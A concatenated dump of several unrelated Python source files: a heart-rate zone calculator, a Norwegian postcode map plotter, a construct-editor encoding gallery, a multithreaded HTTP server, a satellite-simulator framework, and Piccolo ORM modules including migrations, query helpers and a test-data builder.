print("__________________¶¶__¶_¶¶¶¶_¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("__________________¶__¶¶_¶¶¶¶¶¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_¶¶__¶¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_¶¶__¶¶__¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_¶¶_¶¶__¶¶___¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶__¶_¶___¶¶__¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶__¶¶___¶¶___¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶_______¶¶___¶¶¶ ")
time.sleep(0.1)
print("_________________¶¶__¶¶_____¶¶____¶¶¶ ")
time.sleep(0.1)
print("__________________¶__¶¶____¶¶____¶¶¶ ")
time.sleep(0.1)
print("__________________¶¶__¶¶¶¶¶____¶¶¶¶ ")
time.sleep(0.1)
print("__________________¶¶_________¶¶¶¶¶ ")
time.sleep(0.1)
print("___________________¶¶______¶¶¶¶¶ ")
time.sleep(0.1)
print("____________________¶¶¶¶¶¶¶¶¶¶ ")
time.sleep(0.1)
print("______________________¶¶¶¶¶¶ ")
time.sleep(0.1)
print(" _______ _ _ _ _ ")
time.sleep(0.3)
print("|__ __| | | | | | | | | ")
time.sleep(0.3)
print(" | | __ _ _ __ __ _ ___| |_ | |__| | ___ __ _ _ __| |_ ")
time.sleep(0.3)
print(" | |/ _` | '__/ _` |/ _ \ __| | __ |/ _ \/ _` | '__| __|")
time.sleep(0.3)
print(" | | (_| | | | (_| | __/ |_ | | | | __/ (_| | | | |_ ")
time.sleep(0.3)
print(" __|_|\__,_|_| \__, |\___|\__| |_| |_|\___|\__,_|_| \__|")
time.sleep(0.3)
print("| __ \ | | __/ | ")
time.sleep(0.3)
print("| |__) |__ _| |_|___/ ")
time.sleep(0.3)
print("| _ // _` | __/ _ \ ")
time.sleep(0.3)
print("| | \ \ (_| | || __/ ")
time.sleep(0.3)
print("|_| \_\__,_|\__\___| ")
time.sleep(0.3)
print(" ")
low = range(1, 62)
medium = range(62, 75)
high = range(75, 101)
intensity_dict= {
low : "low intensity" ,
medium : "medium intensity",
high : "high intensity"
}
class TargetHeartRate:
"""
This Class Calculates the target heart rate using two different methods
"""
# Class methods to call from other programs when importing
hr_max= lambda age,percent: (220-age)*percent//100
karvonen_hr= lambda age, restingHR, percentage: (((220-age) - restingHR)*percentage//100) + restingHR
# HRmax Method
def hrmax(age, percent):
"""
Using HRmax to determine Exercise intensity provides an estimation
of how hard the end user should exercise. In general, research shows
that an appropriate range of recommended exercise intensity falls
between 55% and 90% of HRmax
"""
# define heart rate maximum
HRmax= 220-age
# return the target heart rate
return HRmax*percent//100
# Karvonen method
def karvonen(age, HRresting, percent):
"""
This function uses the Karvonen method of determining the optimal target heart rate.
As compared to HRmax, for which the range is 55% to 90%, when using
this method to determine intensity, targetHRs during cardiorespiratory
training should fall between 50% to 85% of HRR.
this is to Ensure the target HR is not overestimated
"""
# define heart rate maximum
HRmax = 207-(0.7*age)
global HRreserve
HRreserve = round(HRmax - HRresting)
# return the target heart rate
return round(((HRmax - HRresting)*percent//100) + HRresting)
def heart_rate_reserve(age, HRresting):
HRmax = 220-age
return HRmax - HRresting
# Get VO2 Max
def vo2_max(age,resting_hr ):
"""
Vo2 Max = 15.3 x (MHR/RHR)
MHR = Maximum heart rate. This number is actually the number of beats
over the number of minutes, or the number of beats in 20 seconds multiplied by 3.
RHR = Resting heart rate. The number is also found by dividing beats
by minute or number of beats in 20 seconds multiplied by three.
"""
# Return VO2 Max
return round(15.3*((220-age)/resting_hr),2)
def target_high(age, HRresting):
return TargetHeartRate.karvonen(age, HRresting, 85)
def target_low(age, HRresting):
return TargetHeartRate.karvonen(age, HRresting, 50)
def target_min(HRreserve,RHR):
return HRreserve*0.5 +RHR
target_avg = lambda x, y : (x+y)/2
def zoladz(age):
"""
An alternative to the Karvonen method is the Zoladz method,
which derives exercise zones by subtracting values from HRmax:
THR = HRmax − Adjuster ± 5 bpm
Zone 1 Adjuster = 50 bpm
Zone 2 Adjuster = 40 bpm
Zone 3 Adjuster = 30 bpm
Zone 4 Adjuster = 20 bpm
Zone 5 Adjuster = 10 bpm
"""
adjuster= {
1 : 50, # Easy
2 : 40, # Easy but less
3 : 30, # Medium
4 : 20, # Medium but less
5 : 10 # Hard
}
# Heart Rate Max
HRmax = 220 -int(age)
# Get user input to select a zone
selected_zone= int(input("Select Training Zone: "))
# Use List comprehension to check if selected zone is in the adjuster dict
for key in adjuster:
if key == selected_zone:
THR= HRmax - int(adjuster[key])
return THR
def yes_no(user_input):
option= lambda x: x[0:1].lower()
while True:
choice= option(user_input)
if choice=='y':
# Return yes
return 'yes'
elif choice=='n':
# Return no
return 'no'
else:
# Return yes_no() function
return yes_no(input("Continue? Y/n: "))
def main():
target_heart_rate_program_init()
if yes_no(input("Would you like to continue? y/n: "))=="yes":
runProgram = True
while runProgram:
restingHR= int(input("What is your resting heart rate? "))
age= int(input("How old are you? "))
target_high= TargetHeartRate.target_high(age, restingHR)
target_low= TargetHeartRate.target_low(age, restingHR)
intensity= int(input("What is your target intensity 50-85%? "))
for keys in intensity_dict.keys():
if intensity in keys:
intensity_rating= intensity_dict[keys][::]
targetBPM= TargetHeartRate.karvonen(age, restingHR, intensity)
vo2max= TargetHeartRate.vo2_max(age, restingHR)
target_high= TargetHeartRate.target_high(age, restingHR)
target_low= TargetHeartRate.target_low(age, restingHR)
print("""\nYour target heart rate is : {} bpm
Intensity Level : {}
Target High (85% of HRR) : {} bpm
Target Low (50% of HRR) : {} bpm
Vo2Max : {} ml/kg/min
""".format(targetBPM, intensity_rating, target_high, target_low,vo2max))
if yes_no(input("Do another calculation? y/n: ")) == "yes":
continue
else:
break
return [targetBPM, intensity_rating, target_high, target_low,vo2max]
# Program Starts Here
if __name__ == "__main__":
results= main()
``` |
{
"source": "0rkGrrr1/Exercises",
"score": 4
} |
#### File: Python/Norway post codes map/postcodes_map.py
```python
import geopandas as gpd
def plot_post_code_map():
""" Function processes raw data,
extracts data from column POSTNUMMER,
draws the map of given post codes,
and prints all unique post codes to console. """
#Reading data set:
norway_set = gpd.read_file('Basisdata_0000_Norge_25833_Postnummeromrader_SOSI_Postnummerområde_FLATE.shp')
#Choosing essential columns:
norway_set = norway_set[['POSTNUMMER', 'geometry']]
#Drawing a map with outline of every postal code:
norway_set.plot(figsize=(10, 10), column='POSTNUMMER', cmap='prism',
edgecolor='black', linewidth=0.2)
#Selecting unique postal codes
for item in norway_set[['POSTNUMMER']][:-1]:
uniquelist = norway_set[item].unique()
#Displaying total count of unique postal codes
print('Number of unique rows:')
print(uniquelist.size)
#Printing all unique post codes
print('Unique post codes:')
print(uniquelist.tolist())
plot_post_code_map()
``` |
{
"source": "0rShemesh/construct-editor",
"score": 3
} |
#### File: construct_editor/gallery/test_stringencodded.py
```python
import construct as cs
from . import GalleryItem
from typing import Dict, Any
ENCODDINGS = dict(
ASCII="ascii",
UTF8="utf8",
UTF16="utf16",
MANDARIN="gb2312",
ARABIC="iso8859_6",
RUSSIAN="iso8859_5",
JAPANESE="shift_jis",
PORTUGUESE="cp860",
)
ENCODDINGS_NUMBER = dict([(key,number,) for number,(key,_) in enumerate(ENCODDINGS.items())])
def text_helper(encodding :str, text: str) -> bytes:
return ENCODDINGS_NUMBER[encodding].to_bytes(1, "little") + text.encode(ENCODDINGS[encodding])
def generate_all_string_encodded() -> Dict[str, Any]:
return dict([(key,cs.StringEncoded(cs.GreedyBytes, value),) for key,value in ENCODDINGS.items()])
constr = cs.Struct(
"encodding" / cs.Enum(cs.Int8ub, **ENCODDINGS_NUMBER),
"string"
/ cs.Switch(
cs.this.encodding,
cases=generate_all_string_encodded(),
),
)
gallery_item = GalleryItem(
construct=constr,
example_binarys={
"English": text_helper("ASCII", "hello world"),
"Mandarin" : text_helper("MANDARIN", "你好世界"),
"HINDI" : text_helper("UTF8", "नमस्ते दुनिया"),
"SPANISH" : text_helper("ASCII", "Hola Mundo"),
"FRENCH" : text_helper("ASCII", "Bonjour le monde"),
"ARABIC" : text_helper("ARABIC", "مرحبا بالعالم"),
"RUSSIAN" : text_helper("RUSSIAN", "Привет мир"),
"PORTUGUESE" : text_helper("PORTUGUESE", "<NAME>"),
"INDONESIAN" : text_helper("ASCII", "Halo Dunia"),
"JAPANESE" : text_helper("JAPANESE", "こんにちは世界"),
"emoji": text_helper("UTF8", "🙋🏼🌎"),
"Zeros": bytes(8),
},
)
``` |
{
"source": "0rtis/multithread-http-server",
"score": 2
} |
#### File: 0rtis/multithread-http-server/multithread_http_server.py
```python
import socket
import threading
import time
from http.server import HTTPServer
import logging
class MultiThreadHttpServer:
def __init__(self, host, parallelism, http_handler_class, request_callback=None, log=None):
"""
:param host: host to bind. example: '127.0.0.1:80'
:param parallelism: number of thread listener and backlog
:param http_handler_class: the handler class extending BaseHTTPRequestHandler
:param request_callback: callback on incoming request. This method can be accede in the HTTPHandler instance.
Example: self.server.request_callback(
'GET', # specify http method
self # pass the HTTPHandler instance
)
"""
self.host = host
self.parallelism = parallelism
self.http_handler_class = http_handler_class
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.request_callback = request_callback
self.connection_handlers = []
self.stop_requested = False
self.log = log
def start(self, background=False):
self.socket.bind(self.host)
self.socket.listen(self.parallelism)
if self.log is not None:
self.log.debug("Creating "+str(self.parallelism)+" connection handler")
for i in range(self.parallelism):
ch = ConnectionHandler(self.socket, self.http_handler_class, self.request_callback)
ch.start()
self.connection_handlers.append(ch)
if background:
if self.log is not None:
self.log.debug("Serving (background thread)")
threading.Thread(target=self.__serve).start()
else:
if self.log is not None:
self.log.debug("Serving (current thread)")
self.__serve()
def stop(self):
self.stop_requested = True
for ch in self.connection_handlers:
ch.stop()
def __serve(self):
"""
Serve until stop() is called. Blocking method
:return:
"""
while not self.stop_requested:
time.sleep(1)
class ConnectionHandler(threading.Thread, HTTPServer):
def __init__(self, sock, http_handler_class, request_callback=None):
HTTPServer.__init__(self, sock.getsockname(), http_handler_class, False)
self.socket = sock
self.server_bind = self.server_close = lambda self: None
self.HTTPHandler = http_handler_class
self.request_callback = request_callback
threading.Thread.__init__(self)
self.daemon = True
self.stop_requested = False
def stop(self):
self.stop_requested = True
def run(self):
""" Each thread process request forever"""
self.serve_forever()
def serve_forever(self):
""" Handle requests until stopped """
while not self.stop_requested:
self.handle_request()
print("Finish" + str(threading.current_thread()))
``` |
{
"source": "0saurabh0/p1",
"score": 3
} |
#### File: p1/examples/counter.py
```python
import time
import satsim
class CounterModel(satsim.Model):
def __init__(self, name, description, parent):
super().__init__(name, description, parent)
self.counter = 0
self.count_entrypoint = satsim.EntryPoint("Increase Counter")
self.count_entrypoint.execute = self.count
self.reset_entrypoint = satsim.EntryPoint("Reset Counter")
self.reset_entrypoint.execute = self.reset
self.log_entrypoint = satsim.EntryPoint("Log Counter")
self.log_entrypoint.execute = self.log_count
self.log_time_entrypoint = satsim.EntryPoint("Log Time")
self.log_time_entrypoint.execute = self.log_time
def reset(self):
print("Reset counter")
self.counter = 0
def count(self):
self.counter += 1
print("Increase counter. Value now:", self.counter)
def log_count(self):
print("Log counter:", self.counter)
def log_time(self):
time.sleep(3)
print("Current time:", self.time_keeper.get_simulation_time())
def configure(self, logger, link_registry):
if self._state != self.PUBLISHING:
raise satsim.InvalidComponentState()
self.logger = logger
self.logger.log_info(self, "Counter Model is now configured")
self._state = self.CONFIGURED
def connect(self, simulator):
if self._state != self.CONFIGURED:
raise satsim.InvalidComponentState()
self.simulator = simulator
self.scheduler = simulator.get_scheduler()
self.time_keeper = simulator.get_time_keeper()
self.scheduler.add_simulation_time_event(self.log_time_entrypoint, 0, 1, 7)
self.scheduler.add_simulation_time_event(self.count_entrypoint, 1)
self.scheduler.add_simulation_time_event(self.log_entrypoint, 2, 1.5, 2)
self.scheduler.add_simulation_time_event(self.reset_entrypoint, 3)
self.logger.log_info(self, "Counter Model is now connected")
self._state = self.CONNECTED
# create simulator
simulator = satsim.Simulator()
# create model instance
counter_model = CounterModel("Counter", "Counter Model", simulator)
# add to models container
simulator.add_model(counter_model)
# simulator starting
simulator.publish()
simulator.configure()
simulator.connect()
simulator.initialise()
print("Simulation started")
simulator.run()
# run for some time
for i in range(10):
print("Current event:", simulator.get_scheduler().get_current_event_id())
time.sleep(1)
print("Simulation completed")
simulator.exit()
```
#### File: satsim/kernel/collection.py
```python
from satsim import Object
class Collection(Object):
def __init__(self):
pass
def collection_at(self, index_or_name):
""" shall return the element with the given position or name,
if no element exists with the given position or name, it returns None
"""
pass
def collection_size(self):
""" shall return the number of items in the collection
"""
pass
```
#### File: satsim/kernel/container.py
```python
from satsim import Object
class ContainerFull(Exception):
pass
class DuplicateName(Exception):
pass
class CannotDelete(Exception):
pass
class NotContained(Exception):
pass
class Container(Object):
def __init__(self, name, description="", parent=None):
super().__init__(name, description, parent)
self.components = []
self.max_count = None
self.min_count = None
def get_component(self, name):
for component in self.components:
if component.name == name:
return component
else:
return None
def get_components(self):
return self.components
def add_component(self, component):
if self.max_count is not None:
if len(self.components) >= self.max_count:
raise ContainerFull()
for _component in self.components:
if _component.name == component.name:
raise DuplicateName()
self.components.append(component)
def get_count(self):
return len(self.components)
def get_upper(self):
return self.max_count if self.max_count is not None else -1
def get_lower(self):
return self.min_count if self.min_count is not None else -1
def delete_component(self, component):
if self.min_count is not None:
if len(self.components) <= self.min_count:
raise CannotDelete()
for _component in self.components:
if _component.name == component.name:
self.components.pop(component)
return
else:
raise NotContained()
```
#### File: kernel/services/logger.py
```python
from satsim import Service
class Logger(Service):
INFORMATION = "INFORMATION"
EVENT = "EVENT"
WARNING = "WARNING"
ERROR = "ERROR"
DEBUG = "DEBUG"
def __init__(self, simulator):
self._simulator = simulator
def log(self, sender, message, kind=None):
print("{} | {}".format(kind, message))
def log_info(self, sender, message):
self.log(sender, message, kind=self.INFORMATION)
def log_event(self, sender, message):
self.log(sender, message, kind=self.EVENT)
def log_warning(self, sender, message):
self.log(sender, message, kind=self.WARNING)
def log_error(self, sender, message):
self.log(sender, message, kind=self.ERROR)
def log_debug(self, sender, message):
self.log(sender, message, kind=self.DEBUG)
``` |
{
"source": "0scarB/piccolo",
"score": 2
} |
#### File: app/commands/show_all.py
```python
from piccolo.conf.apps import Finder
def show_all():
"""
Lists all registered Piccolo apps.
"""
app_registry = Finder().get_app_registry()
print("Registered apps:")
for app_path in app_registry.apps:
print(app_path)
```
#### File: apps/migrations/tables.py
```python
from __future__ import annotations
import typing as t
from piccolo.columns import Timestamp, Varchar
from piccolo.columns.defaults.timestamp import TimestampNow
from piccolo.table import Table
class Migration(Table):
name = Varchar(length=200)
app_name = Varchar(length=200)
ran_on = Timestamp(default=TimestampNow())
@classmethod
async def get_migrations_which_ran(
cls, app_name: t.Optional[str] = None
) -> t.List[str]:
"""
Returns the names of migrations which have already run, by inspecting
the database.
"""
query = cls.select(cls.name, cls.ran_on).order_by(cls.ran_on)
if app_name is not None:
query = query.where(cls.app_name == app_name)
return [i["name"] for i in await query.run()]
```
#### File: tester/commands/run.py
```python
from __future__ import annotations
import os
import sys
import typing as t
from piccolo.table import TABLE_REGISTRY
class set_env_var:
def __init__(self, var_name: str, temp_value: str):
"""
Temporarily set an environment variable.
:param var_name:
The name of the environment variable to temporarily change.
:temp_value:
The value that the environment variable will temporarily be set to,
before being reset to it's pre-existing value.
"""
self.var_name = var_name
self.temp_value = temp_value
def set_var(self, value: str):
os.environ[self.var_name] = value
def get_var(self) -> t.Optional[str]:
return os.environ.get(self.var_name)
def __enter__(self):
self.existing_value = self.get_var()
self.set_var(self.temp_value)
def __exit__(self, *args):
if self.existing_value is None:
del os.environ[self.var_name]
else:
self.set_var(self.existing_value)
def run_pytest(pytest_args: t.List[str]) -> int: # pragma: no cover
try:
import pytest
except ImportError:
sys.exit(
"Couldn't find pytest. Please use `pip install 'piccolo[pytest]' "
"to use this feature."
)
return pytest.main(pytest_args)
def refresh_db():
for table_class in TABLE_REGISTRY:
# In case any table classes were imported before we set the
# environment variable.
table_class._meta.refresh_db()
def run(
pytest_args: str = "", piccolo_conf: str = "piccolo_conf_test"
) -> None:
"""
Run your unit test suite using Pytest.
:param piccolo_conf:
The piccolo_conf module to use when running your tests. This will
contain the database settings you want to use. For example
`my_folder.piccolo_conf_test`.
:param pytest_args:
Any options you want to pass to Pytest. For example
`piccolo tester run --pytest_args="-s"`.
"""
with set_env_var(var_name="PICCOLO_CONF", temp_value=piccolo_conf):
refresh_db()
args = pytest_args.split(" ")
sys.exit(run_pytest(args))
```
#### File: user/piccolo_migrations/2020-06-11T21-38-55.py
```python
from piccolo.apps.migrations.auto import MigrationManager
ID = "2020-06-11T21:38:55"
async def forwards():
manager = MigrationManager(migration_id=ID, app_name="user")
manager.add_column(
table_class_name="BaseUser",
tablename="piccolo_user",
column_name="first_name",
column_class_name="Varchar",
params={
"length": 255,
"default": "",
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
manager.add_column(
table_class_name="BaseUser",
tablename="piccolo_user",
column_name="last_name",
column_class_name="Varchar",
params={
"length": 255,
"default": "",
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
return manager
```
#### File: columns/defaults/interval.py
```python
from __future__ import annotations
import datetime
import typing as t
from enum import Enum
from .base import Default
class IntervalCustom(Default): # lgtm [py/missing-equals]
def __init__(
self,
weeks: int = 0,
days: int = 0,
hours: int = 0,
minutes: int = 0,
seconds: int = 0,
milliseconds: int = 0,
microseconds: int = 0,
):
self.weeks = weeks
self.days = days
self.hours = hours
self.minutes = minutes
self.seconds = seconds
self.milliseconds = milliseconds
self.microseconds = microseconds
@property
def timedelta(self):
return datetime.timedelta(
weeks=self.weeks,
days=self.days,
hours=self.hours,
minutes=self.minutes,
seconds=self.seconds,
milliseconds=self.milliseconds,
microseconds=self.microseconds,
)
@property
def postgres(self):
value = self.get_postgres_interval_string(
attributes=[
"weeks",
"days",
"hours",
"minutes",
"seconds",
"milliseconds",
"microseconds",
]
)
return f"'{value}'"
@property
def sqlite(self):
return self.timedelta.total_seconds()
def python(self):
return self.timedelta
@classmethod
def from_timedelta(cls, instance: datetime.timedelta):
return cls(
days=instance.days,
seconds=instance.seconds,
microseconds=instance.microseconds,
)
###############################################################################
IntervalArg = t.Union[
IntervalCustom,
Enum,
None,
datetime.timedelta,
]
__all__ = [
"IntervalArg",
"IntervalCustom",
]
```
#### File: piccolo/columns/reference.py
```python
from __future__ import annotations
import importlib
import inspect
import typing as t
from dataclasses import dataclass, field
if t.TYPE_CHECKING: # pragma: no cover
from piccolo.columns.column_types import ForeignKey
from piccolo.table import Table
@dataclass
class LazyTableReference:
"""
Holds a reference to a ``Table`` subclass. Used to avoid circular
dependencies in the ``references`` argument of ``ForeignKey`` columns.
:param table_class_name:
The name of the ``Table`` subclass. For example, 'Manager'.
:param app_name:
If specified, the ``Table`` subclass is imported from a Piccolo app
with the given name.
:param module_path:
If specified, the ``Table`` subclass is imported from this path.
For example, 'my_app.tables'.
"""
table_class_name: str
app_name: t.Optional[str] = None
module_path: t.Optional[str] = None
def __post_init__(self):
if self.app_name is None and self.module_path is None:
raise ValueError(
"You must specify either app_name or module_path."
)
if self.app_name and self.module_path:
raise ValueError(
"Specify either app_name or module_path - not both."
)
def resolve(self) -> t.Type[Table]:
if self.app_name is not None:
from piccolo.conf.apps import Finder
finder = Finder()
return finder.get_table_with_name(
app_name=self.app_name, table_class_name=self.table_class_name
)
if self.module_path:
module = importlib.import_module(self.module_path)
table: t.Optional[t.Type[Table]] = getattr(
module, self.table_class_name, None
)
from piccolo.table import Table
if (
table is not None
and inspect.isclass(table)
and issubclass(table, Table)
):
return table
else:
raise ValueError(
f"Can't find a Table subclass called {self.app_name} "
f"in {self.module_path}"
)
raise ValueError("You must specify either app_name or module_path.")
def __str__(self):
if self.app_name:
return f"App {self.app_name}.{self.table_class_name}"
elif self.module_path:
return f"Module {self.module_path}.{self.table_class_name}"
else:
return "Unknown"
@dataclass
class LazyColumnReferenceStore:
foreign_key_columns: t.List[ForeignKey] = field(default_factory=list)
def for_table(self, table: t.Type[Table]) -> t.List[ForeignKey]:
return [
i
for i in self.foreign_key_columns
if isinstance(i._foreign_key_meta.references, LazyTableReference)
and i._foreign_key_meta.references.resolve() is table
]
def for_tablename(self, tablename: str) -> t.List[ForeignKey]:
return [
i
for i in self.foreign_key_columns
if isinstance(i._foreign_key_meta.references, LazyTableReference)
and i._foreign_key_meta.references.resolve()._meta.tablename
== tablename
]
LAZY_COLUMN_REFERENCES: LazyColumnReferenceStore = LazyColumnReferenceStore()
```
#### File: query/methods/objects.py
```python
from __future__ import annotations
import typing as t
from dataclasses import dataclass
from piccolo.columns.column_types import ForeignKey
from piccolo.columns.combination import And, Where
from piccolo.custom_types import Combinable
from piccolo.engine.base import Batch
from piccolo.query.base import Query
from piccolo.query.mixins import (
LimitDelegate,
OffsetDelegate,
OrderByDelegate,
OutputDelegate,
PrefetchDelegate,
WhereDelegate,
)
from piccolo.querystring import QueryString
from piccolo.utils.dictionary import make_nested
from piccolo.utils.sync import run_sync
from .select import Select
if t.TYPE_CHECKING: # pragma: no cover
from piccolo.columns import Column
from piccolo.table import Table
@dataclass
class GetOrCreate:
query: Objects
where: Combinable
defaults: t.Dict[t.Union[Column, str], t.Any]
async def run(self):
instance = await self.query.get(self.where).run()
if instance:
instance._was_created = False
return instance
instance = self.query.table()
# If it's a complex `where`, there can be several column values to
# extract e.g. (Band.name == 'Pythonistas') & (Band.popularity == 1000)
if isinstance(self.where, Where):
setattr(
instance,
self.where.column._meta.name, # type: ignore
self.where.value, # type: ignore
)
elif isinstance(self.where, And):
for column, value in self.where.get_column_values().items():
if len(column._meta.call_chain) == 0:
# Make sure we only set the value if the column belongs
# to this table.
setattr(instance, column._meta.name, value)
for column, value in self.defaults.items():
if isinstance(column, str):
column = instance._meta.get_column_by_name(column)
setattr(instance, column._meta.name, value)
await instance.save().run()
instance._was_created = True
return instance
def __await__(self):
"""
If the user doesn't explicity call .run(), proxy to it as a
convenience.
"""
return self.run().__await__()
def run_sync(self):
return run_sync(self.run())
def prefetch(self, *fk_columns) -> GetOrCreate:
self.query.prefetch(*fk_columns)
return self
@dataclass
class Create:
query: Objects
columns: t.Dict[str, t.Any]
async def run(self):
instance = self.query.table()
for column, value in self.columns.items():
if isinstance(column, str):
column = instance._meta.get_column_by_name(column)
setattr(instance, column._meta.name, value)
await instance.save().run()
instance._was_created = True
return instance
def __await__(self):
"""
If the user doesn't explicity call .run(), proxy to it as a
convenience.
"""
return self.run().__await__()
def run_sync(self):
return run_sync(self.run())
@dataclass
class Objects(Query):
"""
Almost identical to select, except you have to select all fields, and
table instances are returned, rather than just data.
"""
__slots__ = (
"nested",
"limit_delegate",
"offset_delegate",
"order_by_delegate",
"output_delegate",
"prefetch_delegate",
"where_delegate",
)
def __init__(
self,
table: t.Type[Table],
prefetch: t.Sequence[t.Union[ForeignKey, t.List[ForeignKey]]] = (),
**kwargs,
):
super().__init__(table, **kwargs)
self.limit_delegate = LimitDelegate()
self.offset_delegate = OffsetDelegate()
self.order_by_delegate = OrderByDelegate()
self.output_delegate = OutputDelegate()
self.output_delegate._output.as_objects = True
self.prefetch_delegate = PrefetchDelegate()
self.prefetch(*prefetch)
self.where_delegate = WhereDelegate()
def output(self, load_json: bool = False) -> Objects:
self.output_delegate.output(
as_list=False, as_json=False, load_json=load_json
)
return self
def limit(self, number: int) -> Objects:
self.limit_delegate.limit(number)
return self
def first(self) -> Objects:
self.limit_delegate.first()
return self
def prefetch(
self, *fk_columns: t.Union[ForeignKey, t.List[ForeignKey]]
) -> Objects:
self.prefetch_delegate.prefetch(*fk_columns)
return self
def get(self, where: Combinable) -> Objects:
self.where_delegate.where(where)
self.limit_delegate.first()
return self
def offset(self, number: int) -> Objects:
self.offset_delegate.offset(number)
return self
def get_or_create(
self,
where: Combinable,
defaults: t.Dict[t.Union[Column, str], t.Any] = {},
):
return GetOrCreate(query=self, where=where, defaults=defaults)
def create(self, **columns: t.Any):
return Create(query=self, columns=columns)
def order_by(self, *columns: Column, ascending=True) -> Objects:
self.order_by_delegate.order_by(*columns, ascending=ascending)
return self
def where(self, *where: Combinable) -> Objects:
self.where_delegate.where(*where)
return self
async def batch(
self, batch_size: t.Optional[int] = None, **kwargs
) -> Batch:
if batch_size:
kwargs.update(batch_size=batch_size)
return await self.table._meta.db.batch(self, **kwargs)
async def response_handler(self, response):
if self.limit_delegate._first:
if len(response) == 0:
return None
if self.output_delegate._output.nested:
return make_nested(response[0])
else:
return response[0]
elif self.output_delegate._output.nested:
return [make_nested(i) for i in response]
else:
return response
@property
def default_querystrings(self) -> t.Sequence[QueryString]:
select = Select(table=self.table)
for attr in (
"limit_delegate",
"where_delegate",
"offset_delegate",
"output_delegate",
"order_by_delegate",
):
setattr(select, attr, getattr(self, attr))
if self.prefetch_delegate.fk_columns:
select.columns(*self.table.all_columns())
for fk in self.prefetch_delegate.fk_columns:
if isinstance(fk, ForeignKey):
select.columns(*fk.all_columns())
else:
raise ValueError(f"{fk} doesn't seem to be a ForeignKey.")
# Make sure that all intermediate objects are fully loaded.
for parent_fk in fk._meta.call_chain:
select.columns(*parent_fk.all_columns())
select.output_delegate.output(nested=True)
return select.querystrings
```
#### File: piccolo/testing/model_builder.py
```python
import json
import typing as t
from datetime import date, datetime, time, timedelta
from decimal import Decimal
from uuid import UUID
from piccolo.columns.base import Column
from piccolo.table import Table
from piccolo.testing.random_builder import RandomBuilder
from piccolo.utils.sync import run_sync
class ModelBuilder:
__DEFAULT_MAPPER: t.Dict[t.Type, t.Callable] = {
bool: RandomBuilder.next_bool,
bytes: RandomBuilder.next_bytes,
date: RandomBuilder.next_date,
datetime: RandomBuilder.next_datetime,
float: RandomBuilder.next_float,
int: RandomBuilder.next_int,
str: RandomBuilder.next_str,
time: RandomBuilder.next_time,
timedelta: RandomBuilder.next_timedelta,
UUID: RandomBuilder.next_uuid,
}
@classmethod
async def build(
cls,
table_class: t.Type[Table],
defaults: t.Dict[t.Union[Column, str], t.Any] = None,
persist: bool = True,
minimal: bool = False,
) -> Table:
"""
Build Table instance with random data and save async.
This can build relationships, supported data types and parameters.
:param table_class:
Table class to randomize.
Examples:
manager = await ModelBuilder.build(Manager)
manager = await ModelBuilder.build(Manager, name='Guido')
manager = await ModelBuilder(persist=False).build(Manager)
manager = await ModelBuilder(minimal=True).build(Manager)
band = await ModelBuilder.build(Band, manager=manager)
"""
return await cls._build(
table_class=table_class,
defaults=defaults,
persist=persist,
minimal=minimal,
)
@classmethod
def build_sync(
cls,
table_class: t.Type[Table],
defaults: t.Dict[t.Union[Column, str], t.Any] = None,
persist: bool = True,
minimal: bool = False,
) -> Table:
"""
Build Table instance with random data and save sync.
This can build relationships, supported data types and parameters.
:param table_class:
Table class to randomize.
Examples:
manager = ModelBuilder.build_sync(Manager)
manager = ModelBuilder.build_sync(Manager, name='Guido')
manager = ModelBuilder(persist=False).build_sync(Manager)
manager = ModelBuilder(minimal=True).build_sync(Manager)
band = ModelBuilder.build_sync(Band, manager=manager)
"""
return run_sync(
cls.build(
table_class=table_class,
defaults=defaults,
persist=persist,
minimal=minimal,
)
)
@classmethod
async def _build(
cls,
table_class: t.Type[Table],
defaults: t.Dict[t.Union[Column, str], t.Any] = None,
minimal: bool = False,
persist: bool = True,
) -> Table:
model = table_class()
defaults = {} if not defaults else defaults
for column, value in defaults.items():
if isinstance(column, str):
column = model._meta.get_column_by_name(column)
setattr(model, column._meta.name, value)
for column in model._meta.columns:
if column._meta.null and minimal:
continue
if column._meta.name in defaults:
continue # Column value exists
if "references" in column._meta.params and persist:
reference_model = await cls._build(
column._meta.params["references"],
persist=True,
)
random_value = getattr(
reference_model,
reference_model._meta.primary_key._meta.name,
)
else:
random_value = cls._randomize_attribute(column)
setattr(model, column._meta.name, random_value)
if persist:
await model.save().run()
return model
@classmethod
def _randomize_attribute(cls, column: Column) -> t.Any:
"""
Generate a random value for a column and apply formatting.
:param column:
Column class to randomize.
"""
if column.value_type == Decimal:
precision, scale = column._meta.params["digits"]
random_value = RandomBuilder.next_float(
maximum=10 ** (precision - scale), scale=scale
)
elif column._meta.choices:
random_value = RandomBuilder.next_enum(column._meta.choices)
else:
random_value = cls.__DEFAULT_MAPPER[column.value_type]()
if "length" in column._meta.params and isinstance(random_value, str):
return random_value[: column._meta.params["length"]]
elif column.column_type in ["JSON", "JSONB"]:
return json.dumps(random_value)
return random_value
```
#### File: 0scarB/piccolo/setup.py
```python
import itertools
import os
import typing as t
from setuptools import find_packages, setup
from piccolo import __VERSION__ as VERSION
directory = os.path.abspath(os.path.dirname(__file__))
extras = ["orjson", "playground", "postgres", "sqlite", "uvloop"]
with open(os.path.join(directory, "README.md")) as f:
LONG_DESCRIPTION = f.read()
def parse_requirement(req_path: str) -> t.List[str]:
"""
Parse requirement file.
Example:
parse_requirement('requirements.txt') # requirements/requirements.txt
parse_requirement('extras/playground.txt') # requirements/extras/playground.txt
Returns:
List[str]: list of requirements specified in the file.
""" # noqa: E501
with open(os.path.join(directory, "requirements", req_path)) as f:
contents = f.read()
return [i.strip() for i in contents.strip().split("\n")]
def extras_require() -> t.Dict[str, t.List[str]]:
"""
Parse requirements in requirements/extras directory
"""
extra_requirements = {}
for extra in extras:
extra_requirements[extra] = parse_requirement(
os.path.join("extras", extra + ".txt")
)
extra_requirements["all"] = [
i for i in itertools.chain.from_iterable(extra_requirements.values())
]
